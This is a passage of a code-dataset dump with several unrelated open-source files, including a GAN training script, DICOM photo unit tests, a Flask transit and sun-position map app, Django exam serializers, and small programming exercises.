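\n                 # third stride-2 conv: 28x28 inputs downsample 28->14->7->4 before Flatten\n                 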
padding='same'))\n#discriminator_model.add(BatchNormalization())\ndiscriminator_model.add(LeakyReLU(alpha=0.01))\n\ndiscriminator_model.add(Flatten())\ndiscriminator_model.add(Dense(1, activation='sigmoid'))\ndiscriminator_model.summary()\n\ndiscriminator_model.compile(loss='binary_crossentropy',\n                            optimizer='adam', metrics=['acc'])\ndiscriminator_model.trainable = False\n\n\n# build GAN\ngan_model = Sequential()\ngan_model.add(generator_model)\ngan_model.add(discriminator_model)\ngan_model.compile(loss='binary_crossentropy', optimizer='adam')\nprint(gan_model.summary())\n\n# create the real and fake labels\nreal = np.ones((batch_size, 1)) # matrix of all ones\nprint(real)\nfake = np.zeros((batch_size, 1)) # matrix of all zeros\nprint(fake)\n\nfor itr in range(epoch):\n    idx = np.random.randint(0, X_train.shape[0], batch_size) # 128 random indices in 0 ~ 60000\n    real_imgs = X_train[idx] # 128 randomly chosen images\n    \n    z = np.random.normal(size=(batch_size, noise)) # Gaussian noise (128, 100)\n    fake_imgs = generator_model.predict(z) # images the generator produced from noise\n    \n    # one training step per batch\n    d_hist_real = discriminator_model.train_on_batch(real_imgs, real)\n    d_hist_fake = discriminator_model.train_on_batch(fake_imgs, fake)\n    \n    d_loss, d_acc = 0.5 * np.add(d_hist_real, d_hist_fake) # average loss and accuracy over real and fake\n\n    #for i in range(5):\n    z = np.random.normal(size=(batch_size, noise)) # Gaussian noise (128, 100)\n    gan_hist = gan_model.train_on_batch(z, real) # label fake images as real to train the generator\n    \n    if itr % sample_interval == 0: # report every 100 iterations\n        print('%d [D loss: %f, acc.: %.2f%%] [G loss: %f]'%(\n            itr, d_loss, d_acc*100, gan_hist))\n        row = col = 4\n        z = np.random.normal(size=(row*col, noise)) # (16, 100)\n        fake_imgs = generator_model.predict((z))\n        fake_imgs = 0.5 * fake_imgs + 0.5 # rescale into the range 0 ~ 1\n        _, axs = plt.subplots(row, col, figsize=(row, col), sharey=True, sharex=True)\n        cnt = 0\n        for i in range(row):\n            for j in range(col):\n                axs[i, j].imshow(fake_imgs[cnt, :, :, 0], cmap='gray')\n                axs[i, j].axis('off')\n                cnt += 1\n        path = os.path.join(OUT_DIR, 'img-{}'.format(itr+1))\n        plt.savefig(path)\n        plt.close()\n    \n","repo_name":"5kdk/Generative_Adversarial_Network_GAN_exam","sub_path":"exam15_CNN_GAN.py","file_name":"exam15_CNN_GAN.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"9152284816","text":"'''\nUnittests for DICOM objects.\n\n@author: Toni Magni\n'''\nimport unittest\nimport logging\nimport importlib\nfrom io import BytesIO\nimport dicom4ortho.m_orthodontic_photograph\nfrom dicom4ortho.controller import SimpleController\nfrom dicom4ortho.m_orthodontic_photograph import OrthodonticPhotograph\nfrom dicom4ortho.defaults import generate_dicom_uid\nfrom datetime import datetime, timezone, timedelta\nfrom pathlib import Path\n\nimport PIL\nfrom pydicom.dataset import Dataset\n\ndef make_photo_metadata():\n    metadata = {\n        \"patient_firstname\": \"Michael\",\n        \"patient_lastname\": \"Jackson\",\n        \"patient_id\": \"X1\",\n        \"patient_sex\": \"M\",\n        \"patient_birthdate\": \"1958-08-29\",\n        \"dental_provider_firstname\": \"Conrad\",\n        \"dental_provider_lastname\": \"Murray\",\n        \"study_instance_uid\": generate_dicom_uid(),\n        \"series_instance_uid\": generate_dicom_uid(),\n        \"series_description\": \"UnitTest make_photo_metadata\",\n        \"days_after_event\": 212,\n        \"treatment_event_type\": \"OrthodonticTreatment\"\n    }\n    return metadata\n\n\ndef photo_generator(image_type: str, filename: Path) -> OrthodonticPhotograph:\n    o = OrthodonticPhotograph(\n        
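# image_type is an orthodontic view code such as \"IV06\" or \"EV08\" (the codes used in the tests below)\n        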
image_type=image_type,\n )\n o.patient_firstname = \"Michael\"\n o.patient_lastname = \"Jackson\"\n o.patient_id = \"X1\"\n o.patient_birthdate = datetime(1958, 8, 29).date()\n o.patient_sex = \"M\"\n o.dental_provider_firstname = \"Conrad\"\n o.dental_provider_lastname = \"Murray\"\n o.input_image_filename = filename\n o.output_image_filename = o.input_image_filename.with_suffix(\".dcm\")\n return o\n\n\nclass PhotoTests(unittest.TestCase):\n\n def setUp(self):\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(funcName)s: %(message)s',\n level=logging.INFO)\n\n def tearDown(self):\n pass\n\n def testDates(self):\n o = OrthodonticPhotograph()\n o.study_datetime = datetime(1592, 2, 3, 12, 14, 11)\n self.assertEqual(o._ds.StudyDate, \"15920203\")\n self.assertEqual(o._ds.StudyTime, \"121411.000000\")\n self.assertEqual(o.study_datetime, datetime(1592, 2, 3, 12, 14, 11))\n\n o.series_datetime = datetime(1492, 2, 3, 13, 14)\n self.assertEqual(o._ds.SeriesDate, \"14920203\")\n self.assertEqual(o._ds.SeriesTime, \"131400.000000\")\n self.assertEqual(o.series_datetime, datetime(1492, 2, 3, 13, 14))\n\n o.timezone = timezone(timedelta(hours=+1))\n o.acquisition_datetime = datetime(1992, 2, 3, 12, 14, 11)\n self.assertEqual(o._ds.AcquisitionDateTime,\n \"19920203121411.000000+0100\")\n self.assertEqual(o._ds.AcquisitionDate, \"19920203\")\n self.assertEqual(o._ds.AcquisitionTime, \"121411.000000\")\n\n o.timezone = timezone(timedelta(hours=-9))\n self.assertEqual(o._ds.TimezoneOffsetFromUTC, \"-0900\")\n self.assertEqual(o.timezone, timezone(timedelta(hours=-9)))\n\n o.set_time_captured(datetime(1993, 10, 12, 22, 32, 43))\n self.assertEqual(o._ds.AcquisitionDateTime,\n \"19931012223243.000000-0900\")\n self.assertEqual(o._ds.AcquisitionDate, \"19931012\")\n self.assertEqual(o._ds.AcquisitionTime, \"223243.000000\")\n self.assertEqual(o._ds.ContentDate, \"19931012\")\n self.assertEqual(o._ds.ContentTime, \"223243.000000\")\n\n def testProgress(self):\n md = make_photo_metadata()\n md[\"days_after_event\"] = 212\n md[\"treatment_event_type\"] = \"OrthodonticTreatment\"\n md[\"image_type\"] = \"EV08\"\n o = OrthodonticPhotograph(**md)\n o._set_dicom_attributes()\n\n self.assertEqual(o._ds.AcquisitionContextSequence[3].NumericValue,212)\n\n\n def testNames(self):\n o = OrthodonticPhotograph()\n o.dental_provider_firstname = \"Toni\"\n self.assertEqual(o._ds.ReferringPhysicianName, \"^Toni\")\n\n o = OrthodonticPhotograph()\n o.dental_provider_lastname = \"Magni\"\n self.assertEqual(o._ds.ReferringPhysicianName, \"Magni^\")\n\n o = OrthodonticPhotograph()\n o.dental_provider_firstname = \"Toni\"\n o.dental_provider_lastname = \"Magni\"\n self.assertEqual(o._ds.ReferringPhysicianName, \"Magni^Toni\")\n self.assertEqual(o.dental_provider_firstname, \"Toni\")\n self.assertEqual(o.dental_provider_lastname, \"Magni\")\n myio = BytesIO()\n o.save_implicit_little_endian(myio)\n\n o = OrthodonticPhotograph()\n o.patient_firstname = \"Toni\"\n self.assertEqual(o._ds.PatientName, \"^Toni\")\n\n o = OrthodonticPhotograph()\n o.patient_lastname = \"Magni\"\n self.assertEqual(o._ds.PatientName, \"Magni^\")\n\n o = OrthodonticPhotograph()\n o.patient_firstname = \"Toni\"\n o.patient_lastname = \"Magni\"\n self.assertEqual(o._ds.PatientName, \"Magni^Toni\")\n self.assertEqual(o.patient_firstname, \"Toni\")\n self.assertEqual(o.patient_lastname, \"Magni\")\n\n o = OrthodonticPhotograph()\n o.operator_firstname = \"Toni\"\n self.assertEqual(o._ds.OperatorsName, \"^Toni\")\n\n o = OrthodonticPhotograph()\n 
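# DICOM person names are caret-delimited (Family^Given), hence the expected values below\n        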
o.operator_lastname = \"Magni\"\n self.assertEqual(o._ds.OperatorsName, \"Magni^\")\n\n o = OrthodonticPhotograph()\n o.operator_firstname = \"Toni\"\n o.operator_lastname = \"Magni\"\n self.assertEqual(o._ds.OperatorsName, \"Magni^Toni\")\n self.assertEqual(o.operator_firstname, \"Toni\")\n self.assertEqual(o.operator_lastname, \"Magni\")\n\n @unittest.skip(\"I don't think NEF is read properly by Pillow\")\n def testNEF(self):\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = Path(\n \".\") / \"test\" / \"resources\" / \"DSC_0001.NEF\"\n metadata['image_type'] = \"IV05\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n\n def testJPG(self):\n resource_path = None\n with importlib.resources.path(\"test.resources\",\"input_from.csv\") as input_csv:\n resource_path = Path(input_csv).parent.absolute()\n\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = resource_path / \"sample_NikonD90.JPG\"\n metadata['image_type'] = \"IV06\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n output_file = (resource_path / \"sample_NikonD90.dcm\")\n assert output_file.exists()\n output_file.unlink()\n\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = resource_path / \"sample_NikonD5600.JPG\"\n metadata['image_type'] = \"IV06\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n output_file = resource_path / \"sample_NikonD5600.dcm\"\n assert output_file.exists()\n output_file.unlink()\n\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = resource_path / \"sample_topsOrtho.jp2\"\n metadata['image_type'] = \"IV06\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n output_file = (resource_path / \"sample_topsOrtho.dcm\")\n assert output_file.exists()\n c.validate_dicom_file()\n output_file.unlink()\n\n @unittest.skip(\"Just a tool, not a test\")\n def testEXIF(self):\n filename = Path(\n # \".\") / \"test\" / \"resources\" / \"sample_topsOrtho.jp2\"\n \".\") / \"test\" / \"resources\" / \"sample_NikonD90.JPG\"\n with PIL.Image.open(filename) as img:\n exif_ifd = img.getexif().getifd\n exif_raw = img.getexif().items()\n for tag in exif_raw:\n print(f\"{tag}\")\n exif = {\n PIL.ExifTags.TAGS[k]: v\n for k, v in exif_raw\n if k in PIL.ExifTags.TAGS\n }\n for tag in exif.items():\n print(f\"{tag}\")\n\n\n@unittest.skip(\"Just a tool, not a test\")\nclass MPO(unittest.TestCase):\n def testsplitMPO(self):\n filename = Path(\n \".\") / \"test\" / \"resources\" / \"DSC_0001.JPG\"\n with PIL.Image.open(filename) as img:\n num_frames = getattr(img, \"n_frames\", 1)\n logging.info(f\"Found {num_frames} frames in {img.format} image\")\n for i in range(num_frames):\n outputfilename = Path(f\"{filename.stem}_{i}{filename.suffix}\")\n img.seek(i)\n img.save(outputfilename, format='jpeg')\n\n self.assertTrue(outputfilename.exists())\n","repo_name":"open-ortho/dicom4ortho","sub_path":"test/test_photography.py","file_name":"test_photography.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"9419447452","text":"from flask import Flask, jsonify, request, session, g, redirect, url_for, abort, render_template, flash\nfrom datetime import date, datetime\nimport get_best_stop_id\nimport get_sunposition\nfrom trip_details import get_trips_details\nimport pandas as pd\nimport json\nimport time\n\napp = 
Flask(__name__)\napp.config.from_object(__name__)\n\napp.config.from_envvar('APP_CONFIG_FILE')\nMAPBOX_ACCESS_KEY = app.config['MAPBOX_ACCESS_KEY']\nTRANSPORT_NSW_ACCESS_KEY = app.config['TRANSPORT_NSW_ACCESS_KEY']\napp.secret_key = 'wicked'\n\nexecution_counter = 0\nuser_origin = 'Parramatta Station'\nuser_destination = 'Central Station'\nuser_time = '2019-10-10T10:30:03'\ntrip_details = get_trips_details(user_origin,user_destination,user_time)\ncoords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n#sun_list = trip_details['sun_pos']\n#[[trip_details['sun_pos'][val],trip_details['sun_pos'][val]] for val in range(0,len(trip_details))]\nsun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n#print(coords_list)\n\n\n\n@app.route('/mapbox_gl', methods=['POST','GET'])\ndef mapbox_gl():\n print(\"I am called\")\n a = get_user_trip_details()\n global user_origin, user_destination, user_time\n global execution_counter\n global trip_details, coords_list, sun_list\n \n print(\"this has fired\", execution_counter, \"times\")\n print(\"User_Time\", user_time)\n \n getters()\n # user_time = session.get('my_var', None)\n # dd = session.get('dd', None)\n\n #print('getters returned',user_time,dds)\n\n\n if a is not None and execution_counter > 0:\n print(\"POST Returned\")\n print(a)\n if a['id'] == 'destination':\n user_destination = a['data']\n try:\n #print(user_origin, user_destination)\n trip_details = get_trips_details(user_origin, user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n\n except NameError:\n print('here 2')\n print('origin not user defined, so set it to default')\n trip_details = get_trips_details('Parramatta Station', user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n else:\n user_origin = a['data']\n #print(user_origin)\n try:\n trip_details = get_trips_details(user_origin, user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n\n except NameError:\n print('destination not user defined, so set it to default')\n trip_details = get_trips_details(user_origin, 'Central Station',user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n \n print(\"i've finished\")\n\n elif execution_counter > 0:\n print(\"time has changed\")\n trip_details = get_trips_details(user_origin, user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n session['reload_val'] = 2\n load_refresh()\n\n execution_counter = execution_counter + 1\n \n return render_template(\n 'mapbox_gl.html', \n 
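# everything below is passed to the Jinja template as rendering context\n        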
ACCESS_KEY=MAPBOX_ACCESS_KEY,\n        Long = trip_details['lon'][0],\n        Lat = trip_details['lat'][0],\n        my_test = execution_counter,\n        sun_posi = sun_list,\n        origin_name = user_origin,\n        destination_name = user_destination,\n        execution_counter = execution_counter,\n        geojson_input = coords_list # needs to be GeoJSON or a list of lists, I think\n        )\ndef get_user_trip_details():\n    data = request.get_json()\n    return data\n\n@app.route('/getters', methods=['POST','GET'])\ndef getters():\n    print(\"I've been called from getters\")\n    global execution_counter\n    print(execution_counter)\n    \n    if request.method == 'POST':\n        print('Incoming..')\n        print(request.get_json()) # parse as JSON\n        #print(\"ummmmmmmmmm\")\n        print('time')\n        print(request.get_json()['time'])\n\n        print('test')\n        print(request.get_json()['test'])\n\n       # session['my_var'] = request.get_json()['time']\n        #session['dd'] = request.get_json()['dest']\n\n        return redirect(url_for('mapbox_gl'))\n\n    # GET request\n    else:\n        print(request.get_json())\n        message = {'greeting': execution_counter}\n        return jsonify(message) # serialize and use JSON headers\n\n@app.route('/load_fresh', methods=['POST','GET'])\ndef load_refresh():\n    print(\"I've been called because everything has loaded and we want to refresh page\")\n\n    val = session.get('reload_val')\n    user_time = session.get('my_var', None)\n    print(val)\n    message = {'reload': val, 'time':user_time}\n\n    print(message)\n    return jsonify(message)\n\n\n\n    \n\n","repo_name":"michaelarg/mysunjourney","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17627374451","text":"# Kush Peter\n# 202103103510506\n# B.Tech CSE\n\nwhile(True):\n\ttry:\n\t\tnumber=input(\"This program will quit when you enter anything other than an integer: \")\n\t\tint(number)\n\texcept ValueError:\n\t\tprint(\"Not a valid integer, exiting the loop.\")\n\t\tbreak","repo_name":"awesomenottee/pracfile","sub_path":"program20.py","file_name":"program20.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"21593034481","text":"'''\n    Greedy algorithm\n'''\n\n\n# the list of states that need to be covered, held in a set (no duplicate elements)\nstates_needed = set([\"mt\", \"wa\", \"or\", \"id\", \"nv\", \"ut\", \"ca\", \"az\"])\n# the available broadcast stations, held in a hash table (dict)\nstations = {}\nstations[\"kfour\"] = set([\"nv\",\"ut\"])\nstations[\"qiukai\"] = set([\"b\",\"a\"])\nstations[\"kfive\"] = set([\"ca\",\"az\",\"or\"])\nstations[\"kone\"] = set([\"id\",\"nv\",\"ut\"])\nstations[\"ktwo\"] = set([\"wa\",\"id\",\"mt\"])\nstations[\"kthree\"] = set([\"or\",\"nv\",\"ca\"])\n\n\nprint(stations)\n\nfinal_stations = set()\n\nwhile states_needed:\n    best_station = None\n\n    states_covered = set()\n    print(\"start\")\n    for station, states in stations.items():\n        print(\"station {}\".format(station))\n        covered = states_needed & states\n        print(\"needed states this station covers: {}\".format(covered))\n        # look for the best choice: a station that covers at least one needed state\n        # the best choice not only qualifies but covers more needed states than any other so far\n        if covered != set():\n            if len(covered) > len(states_covered):\n\n                print(\"this station covers more than the previous best, so it becomes the new pick\")\n                best_station = station\n                print(\"previous states_covered: {}\".format(states_covered))\n                states_covered = covered\n                print(\"updated states_covered: {}\".format(states_covered))\n        else:\n            print(\"station {} covers none of the needed states\".format(station))\n    states_needed -= states_covered\n    # record this pass's winning station once every station has been scanned\n    final_stations.add(best_station)\n    print(\"states still uncovered: 
{}\".format(states_needed))\n\n\nprint(final_stations)\n","repo_name":"ModelKaiSir/python","sub_path":"alg/search3.py","file_name":"search3.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24329151741","text":"#header is not given , only pointer of node to be deleted will be given\nclass Node:\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n def __repr__(self):\n return repr(self.data)\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def append(self, data):\n new = Node(data)\n cur = self.head\n if cur is None:\n self.head = new\n return\n\n while cur.next:\n cur = cur.next\n\n cur.next = new\n\n\n def __repr__(self):\n nodes = []\n cur = self.head\n while cur:\n nodes.append(repr(cur.data))\n cur = cur.next\n\n return '[' + ','.join(nodes) + ']'\n\ndef delete(ptr):\n if ptr is None:\n return None\n\n while ptr.next:\n next = ptr.next\n prev = ptr\n ptr.data , next.data = next.data, ptr.data\n ptr = ptr.next\n prev.next = None\n\nif __name__ == \"__main__\":\n ll = LinkedList()\n ll.append(1)\n ll.append(2)\n ll.append(3)\n ll.append(4)\n ll.append(5)\n ll.append(6)\n ll.append(7)\n print(ll)\n delete(ll.head.next.next.next)\n print(ll)\n\n \n \n","repo_name":"prasilla487/Python_excersizes_DSA","sub_path":"linkedlist/delete_without_header.py","file_name":"delete_without_header.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33608016223","text":"from django.contrib.auth import get_user_model\n\nfrom rest_framework import serializers\n\nfrom .models import (\n Exam,\n Question, \n QuestionAnswer, \n\n UserCheckBoxAnswer, \n UserAnswer, \n UserExam, \n)\nfrom apps.courses.models import Course\n\n\nclass QuestionAnswerSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(required=False)\n\n class Meta:\n model = QuestionAnswer\n fields = ('id', 'title', 'is_correct', )\n\n\nclass ExamQuestionSerializer(serializers.ModelSerializer):\n answers = QuestionAnswerSerializer(many=True, required=False)\n id = serializers.IntegerField(required=False)\n\n class Meta:\n model = Question\n fields = ('id', 'title', 'question_type', 'answers', 'attachment_file')\n\n def validate(self, instance):\n if instance.get('answers'):\n if instance.get('question_type') == Question.RADIO_BUTTON:\n answers = [i for i in instance.get('answers') if i.get('is_correct') == True]\n if len(answers) > 1:\n raise serializers.ValidationError('Must be only one correct answer for radio button question')\n return instance\n\n\nclass ExamCourseSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n title = serializers.CharField(read_only=True)\n\n\nclass ExamSerializer(serializers.ModelSerializer):\n questions = ExamQuestionSerializer(many=True, allow_null=True, write_only=True)\n course = ExamCourseSerializer(required=False)\n\n class Meta:\n model = Exam\n fields = (\n 'id', 'title', 'exam_type', 'questions', \n 'course', 'is_active', 'time_duration', \n )\n\n def to_representation(self, instance):\n data = super(ExamSerializer, self).to_representation(instance)\n current_user = self.context['request'].user\n current_user_passed_exam = UserExam.objects.filter(\n user=current_user,\n exam=instance\n )\n if current_user_passed_exam:\n data['passed_exam'] = True\n else:\n data['passed_exam'] = False\n return data\n\n def create(self, 
validated_data):\n        questions = validated_data.pop('questions')\n        course = validated_data.pop('course', None)\n        if course is not None:\n            try:\n                course = Course.objects.get(id=course.get('id'))\n            except Course.DoesNotExist as e:\n                raise serializers.ValidationError(e)\n            instance = Exam.objects.create(**validated_data, course=course)\n        else:\n            instance = Exam.objects.create(**validated_data)\n        \n        for question in questions:\n            answers = question.pop('answers', [])\n            exam_question = Question.objects.create(exam=instance, **question)\n            for answer in answers:\n                QuestionAnswer.objects.create(question=exam_question, **answer)\n        return instance\n    \n    def update(self, instance, validated_data):\n        questions = validated_data.pop('questions', [])\n        course = validated_data.pop('course', None)\n        if course is not None:\n            try:\n                course = Course.objects.get(id=course.get('id'))\n            except Course.DoesNotExist as e:\n                raise serializers.ValidationError(e)\n            instance.course = course\n        for question in questions:\n            answers = question.pop('answers', [])\n            if question.get('id') is None:\n                question_obj = Question.objects.create(exam=instance, **question)\n            else:\n                question_obj = Question.objects.get(id=question.get('id'))\n                question_obj.title = question.get('title')\n                question_obj.question_type = question.get('question_type')\n                question_obj.save()\n\n            for answer in answers:\n                if answer.get('id') is None:\n                    QuestionAnswer.objects.create(question=question_obj, **answer)\n                else:\n                    answer_obj = QuestionAnswer.objects.get(id=answer.get('id'))\n                    answer_obj.title = answer.get('title')\n                    answer_obj.is_correct = answer.get('is_correct', False)\n                    answer_obj.save()\n        return super().update(instance, validated_data)\n\n\nclass UserCheckBoxAnswerSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = UserCheckBoxAnswer\n        fields = ('id', 'answer', )\n\n\nclass UserAnswerSerializer(serializers.ModelSerializer):\n    check_boxes = UserCheckBoxAnswerSerializer(many=True, required=False)\n    id = serializers.IntegerField(required=False)\n\n    class Meta:\n        model = UserAnswer\n        fields = (\n            'id', 'question', 'answer', 'check_boxes', \n            'answer_text', 'additional_file', 'is_correct', \n        )\n    \n    def get_extra_kwargs(self):\n        extra_kwargs = super(UserAnswerSerializer, self).get_extra_kwargs()\n        if self.context['view'].action in ['create']:\n            kwargs = extra_kwargs.get('is_correct', {})\n            kwargs['read_only'] = True\n            extra_kwargs['is_correct'] = kwargs\n        return extra_kwargs \n\n\nclass UserExamSerializer(serializers.ModelSerializer):\n    user_answers = UserAnswerSerializer(many=True, write_only=True)\n    statistic = serializers.SerializerMethodField()\n\n    class Meta:\n        model = UserExam\n        fields = (\n            'id', 'exam', 'email', 'user_answers', \n            'grade', 'checked', 'statistic', 'first_name', \n            'last_name' , 'phone_number'\n        )\n\n    def create(self, validated_data):\n        user_answers = validated_data.pop('user_answers', [])\n        instance = UserExam.objects.create(**validated_data)\n        \n        # If we don't have a Student yet, we can create one here using the email, first name, last name and phone number\n        # Consider adding this method\n        if validated_data.get('email'):\n            user = get_user_model().objects.filter(email=validated_data.get('email')).first()\n            instance.user = user\n            instance.save()\n\n        ids = []\n        for user_answer in user_answers:\n            answers = user_answer.pop('check_boxes', [])\n\n            if user_answer.get('question').id in ids:\n                continue\n            ids.append(user_answer.get('question').id)\n            user_answer_obj = UserAnswer.objects.create(user_exam=instance, **user_answer)\n\n            if 
answers:\n for answer in answers:\n UserCheckBoxAnswer.objects.create(parent=user_answer_obj, **answer)\n \n instance.auto_check_exam() \n return instance\n \n def validate(self, instance):\n if instance.get('exam') and instance.get('email'):\n exam = Exam.objects.filter(id=instance.get('exam').id).first()\n if exam:\n if not exam.is_active:\n if self.context['request'].user.is_student:\n raise serializers.ValidationError('This exam is not active')\n if UserExam.objects.filter(exam=instance.get('exam').id, email=instance.get('email')):\n raise serializers.ValidationError('This user already has passed this exam')\n return instance\n\n def get_statistic(self, obj):\n return obj.get_statistic()\n\n def update(self, instance, validated_data):\n user_answers = validated_data.pop('user_answers', [])\n for user_answer in user_answers: \n if user_answer.get('id'):\n user_answer_obj = UserAnswer.objects.get(id=user_answer.get('id'))\n user_answer_obj.is_correct = user_answer.get('is_correct')\n user_answer_obj.save()\n\n instance.checked = True # discuss updating this field\n return super().update(instance, validated_data)\n\n\nclass UserDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n fields = ('first_name', 'last_name')\n\n\nclass UserDetailCheckBoxAnswerSerializer(serializers.ModelSerializer):\n answer = QuestionAnswerSerializer()\n class Meta:\n model = UserCheckBoxAnswer\n fields = ('id', 'answer', )\n\n\nclass UserAnswersDetailSerializer(serializers.ModelSerializer):\n check_boxes = UserDetailCheckBoxAnswerSerializer(many=True, required=False)\n id = serializers.IntegerField(required=False)\n answer = QuestionAnswerSerializer()\n question = ExamQuestionSerializer()\n\n class Meta:\n model = UserAnswer\n fields = (\n 'id', 'question', 'answer', 'check_boxes', \n 'answer_text', 'additional_file', 'is_correct', \n )\n\n\nclass UserExamDetailSerializer(serializers.ModelSerializer):\n user = UserDetailSerializer()\n user_answers = UserAnswersDetailSerializer(many=True)\n statistic = serializers.SerializerMethodField()\n\n class Meta:\n model = UserExam\n fields = ('id', 'email', 'grade', 'checked', 'user',\n 'user_answers', 'statistic')\n\n def get_statistic(self, obj):\n return obj.get_statistic()\n\n\nclass UserExamList(serializers.ModelSerializer):\n user = UserDetailSerializer()\n\n class Meta:\n model = UserExam\n fields = ('id', 'email', 'grade', 'checked', 'user')\n\n\nclass QuestionAnswerDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = QuestionAnswer\n fields = ('id', 'title', 'is_correct', )\n extra_kwargs = {\n 'is_correct': {'write_only': True},\n }\n\n\nclass ExamQuestionDetailSerializer(ExamQuestionSerializer):\n answers = QuestionAnswerDetailSerializer(many=True, required=False)\n\n\nclass ExamDetailStudentsSerializer(serializers.ModelSerializer):\n questions = ExamQuestionDetailSerializer(many=True, allow_null=True)\n course = ExamCourseSerializer()\n user_exams = UserExamList(many=True)\n\n class Meta:\n model = Exam\n fields = (\n 'id', 'title', 'exam_type', 'questions', \n 'course', 'user_exams', 'is_active', 'time_duration'\n )\n\n\nclass ExamDetailSerializer(ExamDetailStudentsSerializer):\n questions = ExamQuestionSerializer(many=True, allow_null=True)","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/exams/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":10182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"13538975321","text":"import turtle\nt = turtle.Pen()\nfor x in range(3):\n t.circle(50)\n t.up()\n t.forward(120)\n t.down()\n\nt.up()\nt.back(120)\nt.back(60)\nt.right(90)\nt.forward(50)\nt.left(90)\nt.down()\nt.circle(50)\nt.up()\nt.back(120)\nt.down()\nt.circle(50)\nturtle.done()","repo_name":"Luckercorgi240/python_codes","sub_path":"Python drawing/olympiclogo.py","file_name":"olympiclogo.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040910834","text":"import warnings\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\nfrom typing import cast, Dict, List, NamedTuple, Optional, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nfrom skimage.measure import label, regionprops\nfrom skimage.measure._regionprops import _RegionProperties\nfrom tqdm import tqdm\n\nfrom starfish.core.config import StarfishConfig\nfrom starfish.core.intensity_table.decoded_intensity_table import DecodedIntensityTable\nfrom starfish.core.intensity_table.intensity_table import IntensityTable\nfrom starfish.core.types import Axes, Features, Number, SpotAttributes\n\n\nclass ConnectedComponentDecodingResult(NamedTuple):\n region_properties: List\n label_image: np.ndarray\n decoded_image: np.ndarray\n\n\nclass TargetsMap:\n\n def __init__(self, targets: np.ndarray) -> None:\n \"\"\"\n Creates an invertible mapping between string names of Codebook targets and integer IDs\n that can be interpreted by skimage.measure to decode an image.\n\n Parameters\n ----------\n targets : np.ndarray\n array of string target IDs\n\n \"\"\"\n unique_targets = set(targets) - {'nan'}\n sorted_targets = sorted(unique_targets)\n self._int_to_target: Dict[int, str] = dict(\n zip(range(1, np.iinfo(int).max), sorted_targets)\n )\n self._int_to_target[0] = 'nan'\n self._target_to_int = {v: k for (k, v) in self._int_to_target.items()}\n\n def targets_as_int(self, targets: np.ndarray) -> np.ndarray:\n \"\"\"Transform an array of targets into their integer representation.\n\n Parameters\n ----------\n targets : np.ndarray['U']\n array of string targets to be transformed into integer IDs\n\n Returns\n -------\n np.ndarray[int] :\n array of targets represented by their integer IDs\n\n \"\"\"\n return np.array([self._target_to_int[v] for v in targets])\n\n def targets_as_str(self, targets: np.ndarray) -> np.ndarray:\n \"\"\"Transform an array of integer IDs into their corresponding string target names.\n\n Parameters\n ----------\n targets : np.ndarray[int]\n array of int targets to be transformed into string names\n\n Returns\n -------\n np.ndarray['U']\n array of unicode-encoded target names\n\n \"\"\"\n return 